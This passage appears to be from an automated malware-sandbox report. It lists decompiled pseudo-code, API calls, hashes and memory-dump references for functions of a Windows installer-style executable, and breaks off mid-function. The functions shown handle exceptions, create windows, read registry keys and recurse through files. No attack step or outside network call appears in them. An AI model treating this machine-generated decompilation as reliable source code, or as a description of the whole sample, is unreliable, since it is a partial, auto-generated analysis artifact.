                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID: RegisteredOrganization$RegisteredOwner
                                                                    • API String ID: 3535843008-1113070880
                                                                    • Opcode ID: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
                                                                    • Instruction ID: ca4fc0b31771868649da923643cba903dbb3fbd6f1f7080981924f9495942079
                                                                    • Opcode Fuzzy Hash: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
                                                                    • Instruction Fuzzy Hash: E8F09030744108AFE700EAD4DC56BAA7B9FE787714F60106AF1008BB82C630AE00CF54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040952E, Relevance: 4.6, APIs: 3, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 63%
                                                                    			E0040952E(void* __ebx, void* __edi, void* __esi, void* __ebp, struct _EXCEPTION_POINTERS _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				struct _EXCEPTION_RECORD* _t22;
				intOrPtr* _t25;
				long _t28;
				long _t30;
				long _t31;
				long _t32;
				void* _t33;
				void* _t38;
				long _t41;
				intOrPtr* _t43;
				intOrPtr _t44;
				void* _t45;
				void* _t47;
				void* _t48;
				intOrPtr _t50;

				_t48 = __ebp;
				_t47 = __esi;
				_t45 = __edi;
				_t33 = __ebx;
				_t22 = _a4.ExceptionRecord;
				if((_t22->ExceptionFlags & 0x00000006) == 0) {
					_t41 = _t22->ExceptionInformation[1];
					_t38 = _t22->ExceptionInformation;
					if(_t22->ExceptionCode == 0xeedfade) {
						L11:
						if( *0x6c5035 <= 1 ||  *0x6c5034 > 0) {
							goto L14;
						}
						_t28 = UnhandledExceptionFilter( &_a4);
						_t38 = _t38;
						_t41 = _t41;
						_t22 = _t22;
						if(_t28 != 0) {
							goto L14;
						}
					} else {
						asm("cld");
						E00408328(_t22);
						_t43 =  *0x6cf018; // 0x0
						if(_t43 != 0) {
							_t30 =  *_t43();
							if(_t30 != 0) {
								_t44 = _a12;
								if(_a4.ExceptionRecord->ExceptionCode == 0xeefface) {
									L10:
									_t41 = _t30;
									_t22 = _a4.ExceptionRecord;
									_t38 = _t22->ExceptionAddress;
									goto L11;
								} else {
									_t30 = E00409448(_t30, _t44, __edi);
									if( *0x6c5035 <= 0 ||  *0x6c5034 > 0) {
										goto L10;
									} else {
										_t31 = UnhandledExceptionFilter( &_a4);
										_t32 = _t30;
										if(_t31 != 0) {
											_t41 = _t32;
											_t22 = _a4.ExceptionRecord;
											_t38 = _t22->ExceptionAddress;
											L14:
											_t22->ExceptionFlags = _t22->ExceptionFlags | 0x00000002;
											 *0x6cf020(_a8, "true", _t22, 0, _t38, _t41, _t22,  *[fs:ebx], _t48, _t45, _t47, _t33); // executed
											_t46 = _v8;
											_t25 = E0041063C();
											_push( *_t25);
											 *_t25 = _t50;
											 *((intOrPtr*)(_v8 + 4)) = E00409634;
											E00409498(_t25,  *((intOrPtr*)(_t46 + 4)) + 5, _t47);
											goto __ebx;
										}
									}
								}
							}
						}
					}
				}
				return 1;
			}



















                                                                    0x0040952e
                                                                    0x0040952e
                                                                    0x0040952e
                                                                    0x0040952e
                                                                    0x00409530
                                                                    0x0040953b
                                                                    0x00409547
                                                                    0x0040954a
                                                                    0x0040954d
                                                                    0x004095bd
                                                                    0x004095c4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004095d7
                                                                    0x004095df
                                                                    0x004095e0
                                                                    0x004095e1
                                                                    0x004095e2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040954f
                                                                    0x0040954f
                                                                    0x00409550
                                                                    0x00409555
                                                                    0x0040955d
                                                                    0x00409563
                                                                    0x00409567
                                                                    0x0040956d
                                                                    0x0040957b
                                                                    0x004095b4
                                                                    0x004095b4
                                                                    0x004095b6
                                                                    0x004095ba
                                                                    0x00000000
                                                                    0x0040957d
                                                                    0x0040957d
                                                                    0x00409589
                                                                    0x00000000
                                                                    0x00409594
                                                                    0x0040959a
                                                                    0x004095a2
                                                                    0x004095a3
                                                                    0x004095a9
                                                                    0x004095ab
                                                                    0x004095af
                                                                    0x004095e4
                                                                    0x004095e4
                                                                    0x00409602
                                                                    0x00409608
                                                                    0x0040960c
                                                                    0x00409611
                                                                    0x00409617
                                                                    0x00409623
                                                                    0x0040962d
                                                                    0x00409632
                                                                    0x00409632
                                                                    0x004095a3
                                                                    0x00409589
                                                                    0x0040957b
                                                                    0x00409567
                                                                    0x0040955d
                                                                    0x0040954d
                                                                    0x00409659

                                                                    APIs
                                                                    • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 0040959A
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00009530), ref: 004095D7
                                                                    • RtlUnwind.KERNEL32(?,?,Function_00009530,00000000,?,?,Function_00009530,?), ref: 00409602
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$Unwind
                                                                    • String ID:
                                                                    • API String ID: 1141220122-0
                                                                    • Opcode ID: fc805a50556fb7bd35927c89e36826f9d8d0ac2d4c5cf68863755afacb82e834
                                                                    • Instruction ID: e545f85d7011ee45bc6c766d7eccadc728dc4c1814e3ea314169116c21f0ec9d
                                                                    • Opcode Fuzzy Hash: fc805a50556fb7bd35927c89e36826f9d8d0ac2d4c5cf68863755afacb82e834
                                                                    • Instruction Fuzzy Hash: 8C3180B1604200AFD720DB15CC84F67B7E5EB84714F14896AF408972A3CB39EC84CB69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00414DA0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00414DA0(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				WCHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				WCHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00407404();
				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E004073F4(_t13);
				return _t24;
			}








                                                                    0x00414da7
                                                                    0x00414dac
                                                                    0x00414dae
                                                                    0x00414ddf
                                                                    0x00414de8
                                                                    0x00414df4

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID: TWindowDisabler-Window
                                                                    • API String ID: 716092398-1824977358
                                                                    • Opcode ID: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
                                                                    • Instruction ID: a9fb6cbc93b7d8fca137cee03195aa1e05eb631c50c99d8148995e53eb0ae486
                                                                    • Opcode Fuzzy Hash: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
                                                                    • Instruction Fuzzy Hash: 7BF092B2604158BF9B80DE9DDC81EDB77ECEB4D2A4B05416AFA0CE3201D634ED118BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006AC0D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E006AC0D0(void* __eax, void* __edx, void* __eflags) {
				void* _v8;
				void* __ecx;
				void* _t7;
				void* _t17;
				void* _t24;

				_t24 = _t17;
				_t7 = E005C7A14(__eax, L"Software\\Microsoft\\Windows\\CurrentVersion", 0x80000002,  &_v8, 1, 0); // executed
				if(_t7 != 0) {
					return E0040A1C8(_t24);
				}
				if(E005C793C() == 0) {
					E0040A1C8(_t24);
				}
				return RegCloseKey(_v8);
			}








                                                                    0x006ac0d7
                                                                    0x006ac0f1
                                                                    0x006ac0f8
                                                                    0x00000000
                                                                    0x006ac11e
                                                                    0x006ac108
                                                                    0x006ac10c
                                                                    0x006ac10c
                                                                    0x00000000

                                                                    APIs
                                                                      • Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006B813A,?,006AC32E,00000000,006AC586,?,00000000,00000000), ref: 006AC115
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 006AC0E7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseOpen
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                    • API String ID: 47109696-1019749484
                                                                    • Opcode ID: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
                                                                    • Instruction ID: 9fe961e3a0f1dd2c49f778430c2599f74e8698f8579e7211867226b13b49c2b0
                                                                    • Opcode Fuzzy Hash: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
                                                                    • Instruction Fuzzy Hash: 8FF082317042186BEA04B69E6C52BAEA69D9B86764F60007EF608D7283D9A49E0107A9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C7A14, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E005C7A14(void* __eax, short* __ecx, void* __edx, void** _a4, int _a8, int _a12) {
				long _t7;
				short* _t8;
				void* _t9;
				int _t10;

				_t9 = __edx;
				_t8 = __ecx;
				_t10 = _a8;
				if(__eax == 2) {
					_t10 = _t10 | 0x00000100;
				}
				_t7 = RegOpenKeyExW(_t9, _t8, _a12, _t10, _a4); // executed
				return _t7;
			}







                                                                    0x005c7a14
                                                                    0x005c7a14
                                                                    0x005c7a18
                                                                    0x005c7a1d
                                                                    0x005c7a1f
                                                                    0x005c7a1f
                                                                    0x005c7a30
                                                                    0x005c7a37

                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                                    Strings
                                                                    • Control Panel\Desktop\ResourceLocale, xrefs: 005C7A2E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID: Control Panel\Desktop\ResourceLocale
                                                                    • API String ID: 71445658-1109908249
                                                                    • Opcode ID: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
                                                                    • Instruction ID: f7a531ddb9cdcc56bc9141aac83b8570c2bea4ceb2af7b348951fcc1ebd06380
                                                                    • Opcode Fuzzy Hash: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
                                                                    • Instruction Fuzzy Hash: C3D0C97291022C7B9B009ED9DC41EFB7B9DEB19360F40845AFD0897100C2B4EDA18BF4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060DCC8, Relevance: 3.2, APIs: 2, Instructions: 192fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 63%
                                                                    			E0060DCC8(signed int __eax, void* __ebx, char __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int _a16, signed int _a20, char _a24) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v17;
				intOrPtr _v24;
				char _v25;
				signed int _v26;
				void* _v32;
				struct _WIN32_FIND_DATAW _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				signed char _t106;
				signed char _t108;
				void* _t114;
				int _t122;
				signed int _t127;
				signed char _t135;
				signed char _t139;
				void* _t155;
				signed int _t158;
				intOrPtr _t177;
				intOrPtr _t187;
				void* _t201;
				void* _t202;
				intOrPtr _t203;

				_t159 = __ecx;
				_t201 = _t202;
				_t203 = _t202 + 0xfffffd84;
				_push(__ebx);
				_v640 = 0;
				_v636 = 0;
				_v632 = 0;
				_v628 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v25 = __ecx;
				_v24 = __edx;
				_v17 = __eax;
				_push(_t201);
				_push(0x60df66);
				_push( *[fs:eax]);
				 *[fs:eax] = _t203;
				_v26 = 1;
				if(_a24 == 0) {
					L26:
					__eflags = _a16 & 0x000000ff ^ 0x00000001 | _v26;
					if((_a16 & 0x000000ff ^ 0x00000001 | _v26) != 0) {
						__eflags = _v25;
						if(_v25 != 0) {
							__eflags = _a12;
							if(__eflags == 0) {
								_t106 = E0060C664(_v17 & 0x000000ff, _v24, __eflags); // executed
								__eflags = _t106;
								if(_t106 == 0) {
									_v26 = 0;
								}
							} else {
								_t108 = _a12();
								__eflags = _t108;
								if(_t108 == 0) {
									_v26 = 0;
								}
							}
						}
					}
					__eflags = 0;
					_pop(_t177);
					 *[fs:eax] = _t177;
					_push(E0060DF6D);
					E0040A228( &_v640, 4);
					return E0040A228( &_v16, 3);
				} else {
					_t205 = _v25;
					if(_v25 == 0) {
						L3:
						_t207 = _v25;
						if(_v25 == 0) {
							E005C5428(_v24, _t159,  &_v8);
							E0040A5F0( &_v12, _v24);
						} else {
							E005C4EA4(_v24,  &_v8);
							E0040B4C8( &_v12, 0x60df84, _v8);
						}
						_t114 = E0060C2B0(_v17 & 0x000000ff,  &_v624, _v12, _t207); // executed
						_v32 = _t114;
						if(_v32 == 0xffffffff) {
							goto L26;
						} else {
							_push(_t201);
							_push(0x60def2);
							_push( *[fs:eax]);
							 *[fs:eax] = _t203;
							do {
								E0040B318( &_v16, 0x104,  &(_v624.cFileName));
								E0040B660(_v16, 0x60df94);
								if(0 != 0) {
									_t127 = E0040B660(_v16, 0x60dfa4);
									if(0 != 0) {
										_t158 = _v624.dwFileAttributes;
										if((_t158 & 0x00000001) != 0 && (_t127 & 0xffffff00 | (_t158 & 0x00000010) == 0x00000000 | _a20) != 0) {
											E0040B4C8( &_v628, _v16, _v8);
											E0060C6DC(_v17 & 0x000000ff, _t158 & 0xfffffffe, _v628, _t158 & 0xfffffffe);
										}
										if((_v624.dwFileAttributes & 0x00000010) != 0) {
											__eflags = _a20;
											if(_a20 != 0) {
												E0040B4C8( &_v640, _v16, _v8);
												_t135 = E0060DCC8(_v17 & 0x000000ff, _t158, 1, _v640, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1); // executed
												__eflags = _t135;
												if(_t135 == 0) {
													_v26 = 0;
												}
											}
										} else {
											if(_a8 == 0) {
												E0040B4C8( &_v636, _v16, _v8);
												_t139 = E0060C158(_v17 & 0x000000ff, _v636, __eflags);
												__eflags = _t139;
												if(_t139 == 0) {
													_v26 = 0;
												}
											} else {
												E0040B4C8( &_v632, _v16, _v8);
												if(_a8() == 0) {
													_v26 = 0;
												}
											}
										}
									}
								}
								if(_a16 == 0 || _v26 != 0) {
									goto L24;
								}
								break;
								L24:
								_t122 = FindNextFileW(_v32,  &_v624); // executed
							} while (_t122 != 0);
							_pop(_t187);
							 *[fs:eax] = _t187;
							_push(E0060DEF9);
							return FindClose(_v32);
						}
					} else {
						_t155 = E0060C474(_v17 & 0x000000ff, _v24, _t205); // executed
						if(_t155 == 0) {
							goto L26;
						} else {
							goto L3;
						}
					}
				}
			}






























                                                                    0x0060dcc8
                                                                    0x0060dcc9
                                                                    0x0060dccb
                                                                    0x0060dcd1
                                                                    0x0060dcd4
                                                                    0x0060dcda
                                                                    0x0060dce0
                                                                    0x0060dce6
                                                                    0x0060dcec
                                                                    0x0060dcef
                                                                    0x0060dcf2
                                                                    0x0060dcf5
                                                                    0x0060dcf8
                                                                    0x0060dcfb
                                                                    0x0060dd00
                                                                    0x0060dd01
                                                                    0x0060dd06
                                                                    0x0060dd09
                                                                    0x0060dd0c
                                                                    0x0060dd14
                                                                    0x0060def9
                                                                    0x0060deff
                                                                    0x0060df02
                                                                    0x0060df04
                                                                    0x0060df08
                                                                    0x0060df0a
                                                                    0x0060df0e
                                                                    0x0060df2e
                                                                    0x0060df33
                                                                    0x0060df35
                                                                    0x0060df37
                                                                    0x0060df37
                                                                    0x0060df10
                                                                    0x0060df1a
                                                                    0x0060df1d
                                                                    0x0060df1f
                                                                    0x0060df21
                                                                    0x0060df21
                                                                    0x0060df1f
                                                                    0x0060df0e
                                                                    0x0060df08
                                                                    0x0060df3b
                                                                    0x0060df3d
                                                                    0x0060df40
                                                                    0x0060df43
                                                                    0x0060df53
                                                                    0x0060df65
                                                                    0x0060dd1a
                                                                    0x0060dd1a
                                                                    0x0060dd1e
                                                                    0x0060dd34
                                                                    0x0060dd34
                                                                    0x0060dd38
                                                                    0x0060dd5d
                                                                    0x0060dd68
                                                                    0x0060dd3a
                                                                    0x0060dd40
                                                                    0x0060dd50
                                                                    0x0060dd50
                                                                    0x0060dd7a
                                                                    0x0060dd7f
                                                                    0x0060dd86
                                                                    0x00000000
                                                                    0x0060dd8c
                                                                    0x0060dd8e
                                                                    0x0060dd8f
                                                                    0x0060dd94
                                                                    0x0060dd97
                                                                    0x0060dd9a
                                                                    0x0060dda8
                                                                    0x0060ddb5
                                                                    0x0060ddba
                                                                    0x0060ddc8
                                                                    0x0060ddcd
                                                                    0x0060ddd3
                                                                    0x0060dddc
                                                                    0x0060ddf5
                                                                    0x0060de09
                                                                    0x0060de09
                                                                    0x0060de15
                                                                    0x0060de72
                                                                    0x0060de76
                                                                    0x0060de99
                                                                    0x0060deaa
                                                                    0x0060deaf
                                                                    0x0060deb1
                                                                    0x0060deb3
                                                                    0x0060deb3
                                                                    0x0060deb1
                                                                    0x0060de17
                                                                    0x0060de1b
                                                                    0x0060de54
                                                                    0x0060de63
                                                                    0x0060de68
                                                                    0x0060de6a
                                                                    0x0060de6c
                                                                    0x0060de6c
                                                                    0x0060de1d
                                                                    0x0060de29
                                                                    0x0060de40
                                                                    0x0060de42
                                                                    0x0060de42
                                                                    0x0060de40
                                                                    0x0060de1b
                                                                    0x0060de15
                                                                    0x0060ddcd
                                                                    0x0060debb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0060dec3
                                                                    0x0060dece
                                                                    0x0060ded3
                                                                    0x0060dedd
                                                                    0x0060dee0
                                                                    0x0060dee3
                                                                    0x0060def1
                                                                    0x0060def1
                                                                    0x0060dd20
                                                                    0x0060dd27
                                                                    0x0060dd2e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0060dd2e
                                                                    0x0060dd1e

                                                                    APIs
                                                                    • FindNextFileW.KERNEL32(000000FF,?,00000000,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001), ref: 0060DECE
                                                                    • FindClose.KERNEL32(000000FF,0060DEF9,0060DEF2,?,00000000,0060DF66,?,?,?,006ACB6D,00000000,006ACABC,00000000,00000000,00000001,00000001), ref: 0060DEEC
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Find$CloseFileNext
                                                                    • String ID:
                                                                    • API String ID: 2066263336-0
                                                                    • Opcode ID: 2bf6b48b7341af57f2f3f2ceaef2cdf982b33b7afcb593d7ac095b3d8ca16098
                                                                    • Instruction ID: 99f5a77a41558a3604df8ac4250e6fc047523390e4335a570d25b15aca54e13b
                                                                    • Opcode Fuzzy Hash: 2bf6b48b7341af57f2f3f2ceaef2cdf982b33b7afcb593d7ac095b3d8ca16098
                                                                    • Instruction Fuzzy Hash: CD81B0309442899EDF15DFA5C845BEFBBB6AF45304F1482AAE844673C1C7349F45CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C77F4, Relevance: 3.1, APIs: 2, Instructions: 112registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 90%
                                                                    			E005C77F4(void* __eax, void* __ebx, intOrPtr __ecx, short* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				short* _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				long _t46;
				signed int _t58;
				char _t66;
				intOrPtr _t82;
				void* _t87;
				signed int _t93;
				void* _t96;

				_v8 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_t87 = __eax;
				_push(_t96);
				_push(0x5c792a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t96 + 0xffffffec;
				while(1) {
					_v24 = 0;
					_t46 = RegQueryValueExW(_t87, _v12, 0,  &_v20, 0,  &_v24); // executed
					if(_t46 != 0 || _v20 != _a8 && _v20 != _a4) {
						break;
					}
					if(_v24 != 0) {
						__eflags = _v24 - 0x70000000;
						if(__eflags >= 0) {
							E00428FFC();
						}
						_t80 = _v24 + 1 >> 1;
						E0040A350( &_v8, _v24 + 1 >> 1, 0, __eflags);
						_t58 = RegQueryValueExW(_t87, _v12, 0,  &_v20, E0040A774( &_v8),  &_v24); // executed
						__eflags = _t58 - 0xea;
						if(_t58 == 0xea) {
							continue;
						} else {
							__eflags = _t58;
							if(_t58 != 0) {
								break;
							}
							__eflags = _v20 - _a8;
							if(_v20 == _a8) {
								L12:
								_t93 = _v24 >> 1;
								while(1) {
									__eflags = _t93;
									if(_t93 == 0) {
										break;
									}
									_t66 = _v8;
									__eflags =  *((short*)(_t66 + _t93 * 2 - 2));
									if( *((short*)(_t66 + _t93 * 2 - 2)) == 0) {
										_t93 = _t93 - 1;
										__eflags = _t93;
										continue;
									}
									break;
								}
								__eflags = _v20 - 7;
								if(_v20 == 7) {
									__eflags = _t93;
									if(_t93 != 0) {
										_t93 = _t93 + 1;
										__eflags = _t93;
									}
								}
								E0040B3F0( &_v8, _t80, _t93);
								__eflags = _v20 - 7;
								if(_v20 == 7) {
									__eflags = _t93;
									if(_t93 != 0) {
										(E0040A774( &_v8))[_t93 * 2 - 2] = 0;
									}
								}
								E0040A5A8(_v16, _v8);
								break;
							}
							__eflags = _v20 - _a4;
							if(_v20 != _a4) {
								break;
							}
							goto L12;
						}
					} else {
						E0040A1C8(_v16);
						break;
					}
				}
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(E005C7931);
				return E0040A1C8( &_v8);
			}















                                                                    0x005c77ff
                                                                    0x005c7802
                                                                    0x005c7805
